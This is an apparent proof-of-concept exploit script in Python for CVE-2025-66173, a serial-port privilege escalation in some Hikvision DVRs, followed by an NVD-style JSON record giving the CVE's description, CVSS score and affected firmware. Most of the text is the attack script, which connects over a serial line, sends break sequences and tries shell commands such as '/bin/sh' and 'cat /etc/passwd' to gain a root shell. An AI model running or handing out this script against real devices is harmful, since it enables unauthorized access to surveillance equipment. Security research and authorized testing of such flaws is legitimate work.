CVE-2025-66173

#!/usr/bin/env python3 """ CVE-2025-66173 PoC - Hikvision DVR Serial Port Privilege Escalation Note: This PoC is for educational and authorized testing purposes only. """ import serial import time import sys def exploit_serial_privilege_escalation(port='/dev/ttyUSB0', baudrate=115200): """ Exploit for Hikvision DVR serial port privilege escalation vulnerability. This allows unauthorized shell access via physical serial connection. :param port: Serial port device path :param baudrate: Baud rate for serial communication (typically 115200) """ try: # Connect to serial port ser = serial.Serial( port=port, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=1 ) print(f"[*] Connected to {port} at {baudrate} baud") # Wait for device boot time.sleep(3) # Clear serial buffer ser.flushInput() ser.flushOutput() # Method 1: Try to break into uboot/shell during boot print("[*] Attempting to break into shell during boot...") for _ in range(10): ser.write(b'\r\n') time.sleep(0.3) # Method 2: Send break sequence to trigger shell print("[*] Sending break sequence...") ser.send_break(duration=0.5) time.sleep(1) # Method 3: Try common debug commands to bypass authentication debug_commands = [ b'shell\r\n', b'/bin/sh\r\n', b'exec /bin/sh\r\n', b'id\r\n', b'cat /etc/passwd\r\n', b'uname -a\r\n' ] for cmd in debug_commands: print(f"[*] Trying command: {cmd.decode().strip()}") ser.write(cmd) time.sleep(0.5) # Read response response = ser.read(ser.in_waiting) if response: print(f"[RESPONSE]\n{response.decode('utf-8', errors='ignore')}") # Check if we got shell access if b'#' in response or b'$' in response or b'root' in response: print("[+] Shell access obtained!") return True # Read any remaining data response = ser.read(ser.in_waiting) if response: print(f"[FINAL RESPONSE]\n{response.decode('utf-8', errors='ignore')}") ser.close() return False except serial.SerialException as e: print(f"[-] Serial connection error: {e}") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': print("="*60) print("CVE-2025-66173 - Hikvision DVR Serial Privilege Escalation") print("="*60) port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0' baudrate = int(sys.argv[2]) if len(sys.argv) > 2 else 115200 print(f"[*] Target: {port}") print(f"[*] Baudrate: {baudrate}") print("[*] Starting exploitation...\n") result = exploit_serial_privilege_escalation(port, baudrate) if result: print("\n[!] VULNERABLE - Shell access achieved") else: print("\n[*] Exploitation completed - check output above")

{"cve": {"id": "CVE-2025-66173", "sourceIdentifier": "[email protected]", "published": "2025-12-19T07:16:01.643", "lastModified": "2025-12-23T21:45:17.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is a privilege escalation vulnerability in some Hikvision DVR products. Due to the improper implementation of authentication for the serial port, an attacker with physical access could exploit this vulnerability by connecting to the affected products and gaining access to an unrestricted shell environment."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7104hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "E24B2885-8FBF-4738-8C7A-1C8DB3823EE5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7104hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "8104E12A-CD97-4F8F-9A76-8CD308B9F98A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:hikvision:ds-7204hghi-f1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.30.122_201107", "matchCriteriaId": "6DA771B5-1C67-4A32-90B2-A7E0E9C194F7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:hikvision:ds-7204hghi-f1:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF801EB-DDBF-44C6-84BB-9D903FEBEAC8"}]}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/serial-port-privilege-escalation-vulnerabilities-in-some-hikvision-nvr-devices/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}